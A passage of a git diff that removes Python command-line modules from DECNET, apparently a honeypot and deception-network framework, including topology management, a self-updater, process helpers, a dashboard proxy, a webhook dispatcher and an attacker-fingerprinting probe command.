console.print("[red]Failed to start swarmctl. Ensure 'uvicorn' is installed in the current environment.[/]")
|
||||
@@ -1,348 +0,0 @@
|
||||
"""MazeNET topology CLI: generate / deploy / teardown / list / show."""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.topology.config import TopologyConfig
|
||||
from decnet.topology.generator import generate
|
||||
from decnet.topology.persistence import hydrate, persist
|
||||
from decnet.topology.status import TopologyStatus
|
||||
|
||||
from .gating import _require_master_mode
|
||||
|
||||
_console = Console()
|
||||
|
||||
_group = typer.Typer(
|
||||
name="topology",
|
||||
help="MazeNET nested-topology commands (DECNET master only).",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
|
||||
|
||||
async def _repo():
|
||||
from decnet.web.db.factory import get_repository
|
||||
r = get_repository()
|
||||
await r.initialize()
|
||||
return r
|
||||
|
||||
|
||||
@_group.command("generate")
|
||||
def _generate(
|
||||
name: str = typer.Option(..., "--name", help="Topology name"),
|
||||
depth: int = typer.Option(3, "--depth", min=1, max=16),
|
||||
branching: int = typer.Option(2, "--branching", min=1, max=8),
|
||||
deckies_per_lan: str = typer.Option(
|
||||
"1-3",
|
||||
"--deckies-per-lan",
|
||||
help="Min-max deckies per LAN, e.g. 1-3",
|
||||
),
|
||||
bridge_forward_probability: float = typer.Option(1.0, "--bridge-forward-p", min=0.0, max=1.0),
|
||||
cross_edge_probability: float = typer.Option(0.0, "--cross-edge-p", min=0.0, max=1.0),
|
||||
services: Optional[str] = typer.Option(None, "--services", help="Comma-separated explicit services"),
|
||||
randomize_services: bool = typer.Option(True, "--randomize-services/--no-randomize-services"),
|
||||
seed: Optional[int] = typer.Option(None, "--seed", min=0),
|
||||
) -> None:
|
||||
"""Generate a topology plan and persist it as pending."""
|
||||
_require_master_mode("topology generate")
|
||||
|
||||
try:
|
||||
lo, hi = (int(x) for x in deckies_per_lan.split("-", 1))
|
||||
except ValueError:
|
||||
_console.print("[red]--deckies-per-lan must be formatted as MIN-MAX, e.g. 1-3.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
services_explicit = (
|
||||
[s.strip() for s in services.split(",") if s.strip()] if services else None
|
||||
)
|
||||
|
||||
try:
|
||||
cfg = TopologyConfig(
|
||||
name=name,
|
||||
depth=depth,
|
||||
branching_factor=branching,
|
||||
deckies_per_lan_min=lo,
|
||||
deckies_per_lan_max=hi,
|
||||
bridge_forward_probability=bridge_forward_probability,
|
||||
cross_edge_probability=cross_edge_probability,
|
||||
services_explicit=services_explicit,
|
||||
randomize_services=randomize_services if not services_explicit else False,
|
||||
seed=seed,
|
||||
)
|
||||
except ValueError as e:
|
||||
_console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
plan = generate(cfg)
|
||||
|
||||
async def _go() -> str:
|
||||
repo = await _repo()
|
||||
return await persist(repo, plan)
|
||||
|
||||
tid = asyncio.run(_go())
|
||||
_console.print(f"[green]Topology persisted as pending[/] — id=[bold]{tid}[/]")
|
||||
_console.print(
|
||||
f" LANs: {len(plan.lans)} deckies: {len(plan.deckies)} edges: {len(plan.edges)}"
|
||||
)
|
||||
|
||||
|
||||
@_group.command("list")
|
||||
def _list() -> None:
|
||||
"""List all topologies."""
|
||||
_require_master_mode("topology list")
|
||||
|
||||
async def _go() -> list[dict]:
|
||||
repo = await _repo()
|
||||
return await repo.list_topologies()
|
||||
|
||||
rows = asyncio.run(_go())
|
||||
if not rows:
|
||||
_console.print("[yellow]No topologies.[/]")
|
||||
return
|
||||
table = Table(title="DECNET / MazeNET Topologies")
|
||||
for col in ("id", "name", "mode", "status", "created_at"):
|
||||
table.add_column(col)
|
||||
for r in rows:
|
||||
table.add_row(
|
||||
str(r["id"]),
|
||||
str(r["name"]),
|
||||
str(r["mode"]),
|
||||
str(r["status"]),
|
||||
str(r.get("created_at", "")),
|
||||
)
|
||||
_console.print(table)
|
||||
|
||||
|
||||
@_group.command("show")
|
||||
def _show(topology_id: str = typer.Argument(..., help="Topology id")) -> None:
|
||||
"""Print a structured summary of a topology."""
|
||||
_require_master_mode("topology show")
|
||||
|
||||
async def _go():
|
||||
repo = await _repo()
|
||||
return await hydrate(repo, topology_id)
|
||||
|
||||
hydrated = asyncio.run(_go())
|
||||
if hydrated is None:
|
||||
_console.print(f"[red]No such topology: {topology_id}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
topo = hydrated["topology"]
|
||||
_console.print(
|
||||
f"[bold]{topo['name']}[/] id={topo['id']} status={topo['status']}"
|
||||
f" mode={topo['mode']}"
|
||||
)
|
||||
|
||||
def _decky_name(d: dict) -> str:
|
||||
cfg = d.get("decky_config") or {}
|
||||
return cfg.get("name") or d.get("name") or d["uuid"]
|
||||
|
||||
deckies_by_name = {_decky_name(d): d for d in hydrated["deckies"]}
|
||||
edges_by_lan: dict[str, list[dict]] = {}
|
||||
for e in hydrated["edges"]:
|
||||
edges_by_lan.setdefault(e["lan_id"], []).append(e)
|
||||
|
||||
for lan in hydrated["lans"]:
|
||||
dmz_tag = " [dim](DMZ)[/]" if lan["is_dmz"] else ""
|
||||
_console.print(f"\n[cyan]LAN[/] {lan['name']} {lan['subnet']}{dmz_tag}")
|
||||
lan_edges = edges_by_lan.get(lan["id"], [])
|
||||
for e in lan_edges:
|
||||
# Find the decky name via uuid.
|
||||
decky = next(
|
||||
(d for d in hydrated["deckies"] if d["uuid"] == e["decky_uuid"]),
|
||||
None,
|
||||
)
|
||||
if decky is None:
|
||||
continue
|
||||
cfg = decky.get("decky_config") or {}
|
||||
name = _decky_name(decky)
|
||||
ip = (cfg.get("ips_by_lan") or {}).get(lan["name"]) or decky.get("ip") or "?"
|
||||
tags = []
|
||||
if e["is_bridge"]:
|
||||
tags.append("bridge")
|
||||
if e["forwards_l3"]:
|
||||
tags.append("L3-forward")
|
||||
tag_s = f" [yellow]({', '.join(tags)})[/]" if tags else ""
|
||||
svcs = ",".join(cfg.get("services") or decky.get("services") or []) or "-"
|
||||
_console.print(f" • {name} {ip} svcs={svcs}{tag_s}")
|
||||
|
||||
_ = deckies_by_name # for future cross-reference extensions
|
||||
|
||||
|
||||
@_group.command("deploy")
|
||||
def _deploy(
|
||||
topology_id: str = typer.Argument(..., help="Topology id (must be pending)"),
|
||||
dry_run: bool = typer.Option(False, "--dry-run", help="Write compose + create nets, skip containers"),
|
||||
) -> None:
|
||||
"""Deploy a pending topology."""
|
||||
_require_master_mode("topology deploy")
|
||||
from decnet.engine.deployer import deploy_topology
|
||||
|
||||
async def _go() -> None:
|
||||
repo = await _repo()
|
||||
await deploy_topology(repo, topology_id, dry_run=dry_run)
|
||||
|
||||
asyncio.run(_go())
|
||||
_console.print(f"[green]Topology {topology_id} deployed.[/]")
|
||||
|
||||
|
||||
@_group.command("teardown")
|
||||
def _teardown(
|
||||
topology_id: str = typer.Argument(..., help="Topology id"),
|
||||
) -> None:
|
||||
"""Tear down a topology. Legal from active|degraded|failed|deploying."""
|
||||
_require_master_mode("topology teardown")
|
||||
from decnet.engine.deployer import teardown_topology
|
||||
|
||||
async def _go() -> None:
|
||||
repo = await _repo()
|
||||
await teardown_topology(repo, topology_id)
|
||||
|
||||
asyncio.run(_go())
|
||||
_console.print(f"[green]Topology {topology_id} torn down.[/]")
|
||||
|
||||
|
||||
@_group.command("delete")
|
||||
def _delete(
|
||||
topology_id: str = typer.Argument(..., help="Topology id"),
|
||||
force: bool = typer.Option(
|
||||
False,
|
||||
"--force",
|
||||
help="Skip the confirmation prompt (required for non-interactive use).",
|
||||
),
|
||||
) -> None:
|
||||
"""Delete a topology and all its children (LANs, deckies, edges, mutations).
|
||||
|
||||
Refuses while containers are running — teardown first.
|
||||
"""
|
||||
_require_master_mode("topology delete")
|
||||
|
||||
_RUNNING = {
|
||||
TopologyStatus.DEPLOYING,
|
||||
TopologyStatus.ACTIVE,
|
||||
TopologyStatus.DEGRADED,
|
||||
TopologyStatus.TEARING_DOWN,
|
||||
}
|
||||
|
||||
async def _go() -> tuple[bool, Optional[str]]:
|
||||
repo = await _repo()
|
||||
topo = await repo.get_topology(topology_id)
|
||||
if topo is None:
|
||||
return False, "not-found"
|
||||
if topo["status"] in _RUNNING:
|
||||
return False, str(topo["status"])
|
||||
ok = await repo.delete_topology_cascade(topology_id)
|
||||
return ok, None
|
||||
|
||||
if not force and not typer.confirm(
|
||||
f"Delete topology {topology_id} and all its children? This cannot be undone.",
|
||||
default=False,
|
||||
):
|
||||
_console.print("[yellow]Cancelled.[/]")
|
||||
raise typer.Exit(0)
|
||||
|
||||
ok, reason = asyncio.run(_go())
|
||||
if reason == "not-found":
|
||||
_console.print(f"[red]No such topology: {topology_id}[/]")
|
||||
raise typer.Exit(1)
|
||||
if reason is not None:
|
||||
_console.print(
|
||||
f"[red]Cannot delete while status={reason!r}. Run "
|
||||
f"[bold]decnet topology teardown {topology_id}[/] first.[/]"
|
||||
)
|
||||
raise typer.Exit(1)
|
||||
if not ok:
|
||||
_console.print(f"[red]Delete failed: {topology_id}[/]")
|
||||
raise typer.Exit(1)
|
||||
_console.print(f"[green]Topology {topology_id} deleted.[/]")
|
||||
|
||||
|
||||
@_group.command("mutate")
|
||||
def _mutate(
|
||||
topology_id: str = typer.Argument(..., help="Topology id (active or degraded)"),
|
||||
op: str = typer.Argument(
|
||||
...,
|
||||
help=(
|
||||
"One of: add_lan, remove_lan, add_decky, attach_decky, "
|
||||
"detach_decky, remove_decky, update_decky, update_lan"
|
||||
),
|
||||
),
|
||||
payload_json: str = typer.Option(
|
||||
"{}",
|
||||
"--payload-json",
|
||||
help="JSON payload for the op (see mutator.ops for keys)",
|
||||
),
|
||||
expected_version: Optional[int] = typer.Option(
|
||||
None,
|
||||
"--expected-version",
|
||||
help="Optimistic-concurrency guard; enqueue fails with a "
|
||||
"VersionConflict if the topology has since been mutated.",
|
||||
),
|
||||
) -> None:
|
||||
"""Enqueue a live mutation. The mutator's watch loop applies it."""
|
||||
_require_master_mode("topology mutate")
|
||||
import json
|
||||
|
||||
try:
|
||||
payload = json.loads(payload_json)
|
||||
except ValueError as e:
|
||||
_console.print(f"[red]Invalid JSON: {e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
async def _go() -> str:
|
||||
repo = await _repo()
|
||||
return await repo.enqueue_topology_mutation(
|
||||
topology_id, op, payload, expected_version=expected_version,
|
||||
)
|
||||
|
||||
mid = asyncio.run(_go())
|
||||
_console.print(
|
||||
f"[green]Mutation enqueued[/] — id=[bold]{mid}[/] op={op} "
|
||||
f"(watch for state=applied on [cyan]topology mutations {topology_id}[/])"
|
||||
)
|
||||
|
||||
|
||||
@_group.command("mutations")
|
||||
def _mutations(
|
||||
topology_id: str = typer.Argument(..., help="Topology id"),
|
||||
state: Optional[str] = typer.Option(
|
||||
None,
|
||||
"--state",
|
||||
help="Filter to one of pending|applying|applied|failed",
|
||||
),
|
||||
) -> None:
|
||||
"""List queued/applied mutations for a topology."""
|
||||
_require_master_mode("topology mutations")
|
||||
|
||||
async def _go() -> list[dict]:
|
||||
repo = await _repo()
|
||||
return await repo.list_topology_mutations(topology_id, state=state)
|
||||
|
||||
rows = asyncio.run(_go())
|
||||
if not rows:
|
||||
_console.print("[yellow]No mutations.[/]")
|
||||
return
|
||||
table = Table(title=f"Mutations — topology {topology_id}")
|
||||
for col in ("id", "op", "state", "requested_at", "applied_at", "reason"):
|
||||
table.add_column(col)
|
||||
for r in rows:
|
||||
table.add_row(
|
||||
str(r["id"]),
|
||||
str(r["op"]),
|
||||
str(r["state"]),
|
||||
str(r.get("requested_at", "")),
|
||||
str(r.get("applied_at") or ""),
|
||||
str(r.get("reason") or ""),
|
||||
)
|
||||
_console.print(table)
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
app.add_typer(_group, name="topology")
|
||||
|
||||
|
||||
__all__ = ["register", "TopologyStatus"]
|
||||
@@ -1,46 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import pathlib as _pathlib
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def updater(
|
||||
port: int = typer.Option(8766, "--port", help="Port for the self-updater daemon"),
|
||||
host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the updater"), # nosec B104
|
||||
updater_dir: Optional[str] = typer.Option(None, "--updater-dir", help="Updater cert bundle dir (default: ~/.decnet/updater)"),
|
||||
install_dir: Optional[str] = typer.Option(None, "--install-dir", help="Release install root (default: /opt/decnet)"),
|
||||
agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker agent cert bundle (for local /health probes; default: ~/.decnet/agent)"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Run the DECNET self-updater (requires a bundle in ~/.decnet/updater/)."""
|
||||
from decnet.swarm import pki as _pki
|
||||
from decnet.updater import server as _upd_server
|
||||
|
||||
resolved_updater = _pathlib.Path(updater_dir) if updater_dir else _upd_server.DEFAULT_UPDATER_DIR
|
||||
resolved_install = _pathlib.Path(install_dir) if install_dir else _pathlib.Path("/opt/decnet")
|
||||
resolved_agent = _pathlib.Path(agent_dir) if agent_dir else _pki.DEFAULT_AGENT_DIR
|
||||
|
||||
if daemon:
|
||||
log.info("updater daemonizing host=%s port=%d", host, port)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"updater command invoked host=%s port=%d updater_dir=%s install_dir=%s",
|
||||
host, port, resolved_updater, resolved_install,
|
||||
)
|
||||
console.print(f"[green]Starting DECNET self-updater on {host}:{port} (mTLS)...[/]")
|
||||
rc = _upd_server.run(
|
||||
host, port,
|
||||
updater_dir=resolved_updater,
|
||||
install_dir=resolved_install,
|
||||
agent_dir=resolved_agent,
|
||||
)
|
||||
if rc != 0:
|
||||
raise typer.Exit(rc)
|
||||
@@ -1,217 +0,0 @@
|
||||
"""Shared CLI helpers: console, logger, process management, swarm HTTP client.
|
||||
|
||||
Submodules reference these as ``from . import utils`` then ``utils.foo(...)``
|
||||
so tests can patch ``decnet.cli.utils.<name>`` and have every caller see it.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
|
||||
|
||||
log = get_logger("cli")
|
||||
console = Console()
|
||||
|
||||
|
||||
def _daemonize() -> None:
|
||||
"""Fork the current process into a background daemon (Unix double-fork)."""
|
||||
if os.fork() > 0:
|
||||
raise SystemExit(0)
|
||||
os.setsid()
|
||||
if os.fork() > 0:
|
||||
raise SystemExit(0)
|
||||
sys.stdout = open(os.devnull, "w") # noqa: SIM115
|
||||
sys.stderr = open(os.devnull, "w") # noqa: SIM115
|
||||
sys.stdin = open(os.devnull, "r") # noqa: SIM115
|
||||
|
||||
|
||||
def _pid_dir() -> Path:
|
||||
"""Return the writable PID directory.
|
||||
|
||||
/opt/decnet when it exists and is writable (production), else
|
||||
~/.decnet (dev). The directory is created if needed."""
|
||||
candidates = [Path("/opt/decnet"), Path.home() / ".decnet"]
|
||||
for path in candidates:
|
||||
try:
|
||||
path.mkdir(parents=True, exist_ok=True)
|
||||
if os.access(path, os.W_OK):
|
||||
return path
|
||||
except (PermissionError, OSError):
|
||||
continue
|
||||
return Path("/tmp") # nosec B108
|
||||
|
||||
|
||||
def _spawn_detached(argv: list[str], pid_file: Path) -> int:
|
||||
"""Spawn a DECNET subcommand as a fully-independent sibling process.
|
||||
|
||||
The parent does NOT wait() on this child. start_new_session=True puts
|
||||
the child in its own session so SIGHUP on parent exit doesn't kill it;
|
||||
stdin/stdout/stderr go to /dev/null so the launching shell can close
|
||||
without EIO on the child. close_fds=True prevents inherited sockets
|
||||
from pinning ports we're trying to rebind.
|
||||
|
||||
This is deliberately NOT a supervisor — we fire-and-forget. If the
|
||||
child dies, the operator restarts it manually via its own subcommand.
|
||||
"""
|
||||
if pid_file.exists():
|
||||
try:
|
||||
existing = int(pid_file.read_text().strip())
|
||||
os.kill(existing, 0)
|
||||
return existing
|
||||
except (ValueError, ProcessLookupError, PermissionError, OSError):
|
||||
pass # stale pid_file — fall through and spawn
|
||||
|
||||
with open(os.devnull, "rb") as dn_in, open(os.devnull, "ab") as dn_out:
|
||||
proc = subprocess.Popen( # nosec B603
|
||||
argv,
|
||||
stdin=dn_in, stdout=dn_out, stderr=dn_out,
|
||||
start_new_session=True, close_fds=True,
|
||||
)
|
||||
pid_file.parent.mkdir(parents=True, exist_ok=True)
|
||||
pid_file.write_text(f"{proc.pid}\n")
|
||||
return proc.pid
|
||||
|
||||
|
||||
def _is_running(match_fn) -> int | None:
|
||||
"""Return PID of a running DECNET process matching ``match_fn(cmdline)``, or None."""
|
||||
import psutil
|
||||
|
||||
for proc in psutil.process_iter(["pid", "cmdline"]):
|
||||
try:
|
||||
cmd = proc.info["cmdline"]
|
||||
if cmd and match_fn(cmd):
|
||||
return proc.info["pid"]
|
||||
except (psutil.NoSuchProcess, psutil.AccessDenied):
|
||||
continue
|
||||
return None
|
||||
|
||||
|
||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
|
||||
"""Return the microservice registry for health-check and relaunch.
|
||||
|
||||
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
||||
which doesn't include "decnet.cli" in its cmdline. On master dev boxes
|
||||
they're launched via `python -m decnet.cli`. Match either form — cmd
|
||||
is a list of argv tokens, so substring-check the joined string.
|
||||
"""
|
||||
_py = sys.executable
|
||||
|
||||
def _matches(sub: str, extras: tuple[str, ...] = ()):
|
||||
def _check(cmd) -> bool:
|
||||
joined = " ".join(cmd) if not isinstance(cmd, str) else cmd
|
||||
if "decnet" not in joined:
|
||||
return False
|
||||
if sub not in joined:
|
||||
return False
|
||||
return all(e in joined for e in extras)
|
||||
return _check
|
||||
|
||||
return [
|
||||
("Collector", _matches("collect"),
|
||||
[_py, "-m", "decnet.cli", "collect", "--daemon", "--log-file", log_file]),
|
||||
("Mutator", _matches("mutate", ("--watch",)),
|
||||
[_py, "-m", "decnet.cli", "mutate", "--daemon", "--watch"]),
|
||||
("Prober", _matches("probe"),
|
||||
[_py, "-m", "decnet.cli", "probe", "--daemon", "--log-file", log_file]),
|
||||
("Profiler", _matches("profiler"),
|
||||
[_py, "-m", "decnet.cli", "profiler", "--daemon"]),
|
||||
("Sniffer", _matches("sniffer"),
|
||||
[_py, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", log_file]),
|
||||
("API",
|
||||
lambda cmd: "uvicorn" in cmd and "decnet.web.api:app" in cmd,
|
||||
[_py, "-m", "uvicorn", "decnet.web.api:app",
|
||||
"--host", DECNET_API_HOST, "--port", str(DECNET_API_PORT)]),
|
||||
]
|
||||
|
||||
|
||||
def _systemd_units(pattern: str = "decnet-*.service") -> list[dict] | None:
|
||||
"""Return state of every systemd unit matching *pattern*, or ``None``
|
||||
when systemctl is unavailable (non-systemd host, container lab,
|
||||
PATH-stripped env, user-manager unreachable).
|
||||
|
||||
Output shape mirrors ``systemctl list-units --output=json``: each
|
||||
dict has ``unit``, ``load``, ``active``, ``sub``, ``description``.
|
||||
Empty list = systemd works but no matching units are loaded (fresh
|
||||
host that never ran ``decnet init``).
|
||||
"""
|
||||
import json # local import — avoids paying it on every CLI startup
|
||||
import shutil
|
||||
|
||||
if not shutil.which("systemctl"):
|
||||
return None
|
||||
try:
|
||||
proc = subprocess.run( # nosec B603 B607 — fixed argv, no shell
|
||||
[
|
||||
"systemctl", "list-units",
|
||||
"--type=service", "--all",
|
||||
"--no-legend", "--no-pager",
|
||||
"--output=json",
|
||||
pattern,
|
||||
],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5,
|
||||
check=False,
|
||||
)
|
||||
except (OSError, subprocess.SubprocessError):
|
||||
return None
|
||||
if proc.returncode != 0:
|
||||
return None
|
||||
try:
|
||||
data = json.loads(proc.stdout or "[]")
|
||||
except json.JSONDecodeError:
|
||||
return None
|
||||
return data if isinstance(data, list) else None
|
||||
|
||||
|
||||
def _kill_all_services() -> None:
|
||||
"""Find and kill all running DECNET microservice processes."""
|
||||
registry = _service_registry(str(DECNET_INGEST_LOG_FILE))
|
||||
killed = 0
|
||||
for name, match_fn, _launch_args in registry:
|
||||
pid = _is_running(match_fn)
|
||||
if pid is not None:
|
||||
console.print(f"[yellow]Stopping {name} (PID {pid})...[/]")
|
||||
os.kill(pid, signal.SIGTERM)
|
||||
killed += 1
|
||||
|
||||
if killed:
|
||||
console.print(f"[green]{killed} background process(es) stopped.[/]")
|
||||
else:
|
||||
console.print("[dim]No DECNET services were running.[/]")
|
||||
|
||||
|
||||
_DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
|
||||
|
||||
|
||||
def _swarmctl_base_url(url: Optional[str]) -> str:
|
||||
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
|
||||
|
||||
|
||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
||||
"""Tiny sync wrapper around httpx; avoids leaking async into the CLI."""
|
||||
import httpx
|
||||
try:
|
||||
resp = httpx.request(method, url, json=json_body, timeout=timeout)
|
||||
except httpx.HTTPError as exc:
|
||||
console.print(f"[red]Could not reach swarm controller at {url}: {exc}[/]")
|
||||
console.print("[dim]Is `decnet swarmctl` running?[/]")
|
||||
raise typer.Exit(2)
|
||||
if resp.status_code >= 400:
|
||||
try:
|
||||
detail = resp.json().get("detail", resp.text)
|
||||
except Exception: # nosec B110
|
||||
detail = resp.text
|
||||
console.print(f"[red]{method} {url} failed: {resp.status_code} — {detail}[/]")
|
||||
raise typer.Exit(1)
|
||||
return resp
|
||||
@@ -1,153 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_WEB_HOST, DECNET_WEB_PORT
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _proxy_target(api_host: str) -> str:
|
||||
"""Resolve the host the web proxy should connect to.
|
||||
|
||||
The API binds at ``DECNET_API_HOST``; when that's a wildcard
|
||||
(``0.0.0.0`` / ``::``) we still connect over loopback because the
|
||||
web and API run in the same host. When the operator binds the API
|
||||
to a specific address (e.g. a Tailscale IP), the API is *only*
|
||||
reachable there — loopback is closed — so the proxy must follow.
|
||||
"""
|
||||
wildcard = {"0.0.0.0", "::", ""} # nosec B104 — comparison only
|
||||
if api_host in wildcard:
|
||||
return "127.0.0.1"
|
||||
return api_host
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="web")
|
||||
def serve_web(
|
||||
web_port: int = typer.Option(DECNET_WEB_PORT, "--web-port", help="Port to serve the DECNET Web Dashboard"),
|
||||
host: str = typer.Option(DECNET_WEB_HOST, "--host", help="Host IP to serve the Web Dashboard"),
|
||||
api_host: str = typer.Option(DECNET_API_HOST, "--api-host", help="Host the DECNET API is listening on (loopback for wildcard binds)"),
|
||||
api_port: int = typer.Option(DECNET_API_PORT, "--api-port", help="Port the DECNET API is listening on"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Serve the DECNET Web Dashboard frontend.
|
||||
|
||||
Proxies /api/* requests to the API server so the frontend can use
|
||||
relative URLs (/api/v1/...) with no CORS configuration required.
|
||||
"""
|
||||
import http.client
|
||||
import http.server
|
||||
import os
|
||||
import socketserver
|
||||
from pathlib import Path
|
||||
|
||||
dist_dir = Path(__file__).resolve().parent.parent.parent / "decnet_web" / "dist"
|
||||
|
||||
if not dist_dir.exists():
|
||||
console.print(f"[red]Frontend build not found at {dist_dir}. Make sure you run 'npm run build' inside 'decnet_web'.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
_api_target = _proxy_target(api_host)
|
||||
|
||||
if daemon:
|
||||
log.info(
|
||||
"web daemonizing host=%s port=%d api_target=%s:%d",
|
||||
host, web_port, _api_target, api_port,
|
||||
)
|
||||
_utils._daemonize()
|
||||
|
||||
_api_port = api_port
|
||||
|
||||
class SPAHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("GET")
|
||||
return
|
||||
path = self.translate_path(self.path)
|
||||
if not Path(path).exists() or Path(path).is_dir():
|
||||
self.path = "/index.html"
|
||||
return super().do_GET()
|
||||
|
||||
def do_POST(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("POST")
|
||||
return
|
||||
self.send_error(405)
|
||||
|
||||
def do_PUT(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("PUT")
|
||||
return
|
||||
self.send_error(405)
|
||||
|
||||
def do_DELETE(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("DELETE")
|
||||
return
|
||||
self.send_error(405)
|
||||
|
||||
def do_PATCH(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("PATCH")
|
||||
return
|
||||
self.send_error(405)
|
||||
|
||||
def do_OPTIONS(self):
|
||||
if self.path.startswith("/api/"):
|
||||
self._proxy("OPTIONS")
|
||||
return
|
||||
self.send_error(405)
|
||||
|
||||
def _proxy(self, method: str) -> None:
|
||||
content_length = int(self.headers.get("Content-Length", 0))
|
||||
body = self.rfile.read(content_length) if content_length else None
|
||||
|
||||
forward = {k: v for k, v in self.headers.items()
|
||||
if k.lower() not in ("host", "connection")}
|
||||
|
||||
try:
|
||||
conn = http.client.HTTPConnection(_api_target, _api_port, timeout=120)
|
||||
conn.request(method, self.path, body=body, headers=forward)
|
||||
resp = conn.getresponse()
|
||||
|
||||
self.send_response(resp.status)
|
||||
for key, val in resp.getheaders():
|
||||
if key.lower() not in ("connection", "transfer-encoding"):
|
||||
self.send_header(key, val)
|
||||
self.end_headers()
|
||||
|
||||
content_type = resp.getheader("Content-Type", "")
|
||||
if "text/event-stream" in content_type:
|
||||
conn.sock.settimeout(None)
|
||||
|
||||
_read = getattr(resp, "read1", resp.read)
|
||||
while True:
|
||||
chunk = _read(4096)
|
||||
if not chunk:
|
||||
break
|
||||
self.wfile.write(chunk)
|
||||
self.wfile.flush()
|
||||
except Exception as exc:
|
||||
log.warning("web proxy error %s %s: %s", method, self.path, exc)
|
||||
self.send_error(502, f"API proxy error: {exc}")
|
||||
finally:
|
||||
try:
|
||||
conn.close()
|
||||
except Exception: # nosec B110 — best-effort conn cleanup
|
||||
pass
|
||||
|
||||
def log_message(self, fmt: str, *args: object) -> None:
|
||||
log.debug("web %s", fmt % args)
|
||||
|
||||
os.chdir(dist_dir)
|
||||
|
||||
socketserver.TCPServer.allow_reuse_address = True
|
||||
with socketserver.ThreadingTCPServer((host, web_port), SPAHTTPRequestHandler) as httpd:
|
||||
console.print(f"[green]Serving DECNET Web Dashboard on http://{host}:{web_port}[/]")
|
||||
console.print(f"[dim]Proxying /api/* → http://{_api_target}:{_api_port}[/]")
|
||||
try:
|
||||
httpd.serve_forever()
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[dim]Shutting down dashboard server.[/]")
|
||||
@@ -1,35 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="webhook")
|
||||
def webhook_cmd(
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d", help="Detach to background as a daemon process"
|
||||
),
|
||||
) -> None:
|
||||
"""Run the webhook dispatcher — bus consumer → external HTTP egress."""
|
||||
import asyncio
|
||||
from decnet.web.dependencies import repo
|
||||
from decnet.webhook import webhook_worker
|
||||
|
||||
if daemon:
|
||||
log.info("webhook daemonizing")
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("webhook starting")
|
||||
console.print("[bold cyan]Webhook dispatcher starting[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await webhook_worker(repo)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Webhook worker stopped.[/]")
|
||||
@@ -1,297 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def probe(
|
||||
log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path for RFC 5424 syslog + .json output (reads attackers from .json, writes results to both)"),
|
||||
interval: int = typer.Option(300, "--interval", "-i", help="Seconds between probe cycles (default: 300)"),
|
||||
timeout: float = typer.Option(5.0, "--timeout", help="Per-probe TCP timeout in seconds"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background (used by deploy, no console output)"),
|
||||
) -> None:
|
||||
"""Fingerprint attackers (JARM + HASSH + TCP/IP stack) discovered in the log stream."""
|
||||
import asyncio
|
||||
from decnet.prober import prober_worker
|
||||
|
||||
if daemon:
|
